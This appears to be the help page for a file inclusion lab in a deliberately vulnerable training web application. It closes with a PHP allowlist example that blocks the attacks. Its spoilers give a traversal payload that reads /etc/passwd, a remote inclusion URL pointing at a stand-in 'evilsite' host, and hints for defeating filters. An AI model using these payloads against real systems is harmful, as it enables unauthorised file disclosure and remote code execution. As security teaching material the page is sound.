About

Some web applications allow the user to specify input that is used directly in file streams, or allow the user to upload files to the server. At a later time the web application accesses the user-supplied input in the web application's context. By doing this, the web application is allowing the potential for malicious file execution.

If the file chosen to be included is local on the target machine, it is called "Local File Inclusion" (LFI). But files may also be included from other machines, in which case the attack is a "Remote File Inclusion" (RFI).

When RFI is not an option, using another vulnerability with LFI (such as file upload and directory traversal) can often achieve the same effect.

Note, the term "file inclusion" is not the same as "arbitrary file access" or "file disclosure".

Objective

Read all five famous quotes from '../hackable/flags/fi.php' using only the file inclusion.

Low Level

This allows for direct input into one of many PHP functions that will include the content when executing. Whether RFI is a possibility depends on the web service configuration.

Spoiler: LFI: ?page=../../../../../../etc/passwd
Spoiler: RFI: ?page=http://www.evilsite.com/evil.php

Medium Level

The developer has read up on some of the issues with LFI/RFI, and decided to filter the input. However, the patterns that are used aren't enough.

Spoiler: LFI: Possible, due to it only cycling through the pattern matching once.
Spoiler: RFI: .

High Level

The developer has had enough. They decided to only allow certain files to be used. However, as there are multiple files with the same basename, they use a wildcard to include them all.

Spoiler: LFI: The filename only has to start with a certain value.
Spoiler: RFI: Need to link in another vulnerability, such as file upload.

Impossible Level

The developer calls it quits and hardcodes only the allowed pages, with their exact filenames. By doing this, it removes all avenues of attack.
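The Impossible Level approach can be sketched as follows. This is an added example, not the application's own source: the page names, the resolve_page() helper and the temporary directory are assumptions, and the realpath() containment check goes one step beyond the exact-name allowlist described above. The two rejected payloads are the ones from the Low Level spoilers.

```php
<?php
// Added example (not the application's code). Page names are assumed.
const ALLOWED_PAGES = ['include.php', 'file1.php', 'file2.php', 'file3.php'];

// Hypothetical helper: returns the absolute path to include, or null.
function resolve_page(string $requested, string $baseDir): ?string
{
    // 1. Exact, case-sensitive match against the hardcoded names.
    //    No wildcard and no "starts with" test.
    if (!in_array($requested, ALLOWED_PAGES, true)) {
        return null;
    }
    // 2. Defence in depth: the resolved path (symlinks followed)
    //    must still sit inside the page directory.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a temporary page directory holding stub files.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'fi_demo_' . getmypid();
is_dir($dir) || mkdir($dir);
foreach (ALLOWED_PAGES as $name) {
    file_put_contents($dir . DIRECTORY_SEPARATOR . $name, "<?php // stub\n");
}

// Constructed inputs; the second and third are the Low Level spoilers.
$inputs = [
    'file1.php',
    '../../../../../../etc/passwd',
    'http://www.evilsite.com/evil.php',
    'file4.php',   // not on the list
    'FILE1.PHP',   // wrong case, not an exact match
];
foreach ($inputs as $in) {
    $resolved = resolve_page($in, $dir);
    printf("%-36s %s\n", $in,
        $resolved === null ? 'rejected' : 'include ' . basename($resolved));
}

// Remove the demo files again.
array_map('unlink', glob($dir . DIRECTORY_SEPARATOR . '*.php'));
rmdir($dir);
```

Only file1.php is accepted; every other input is rejected before any path is built from it.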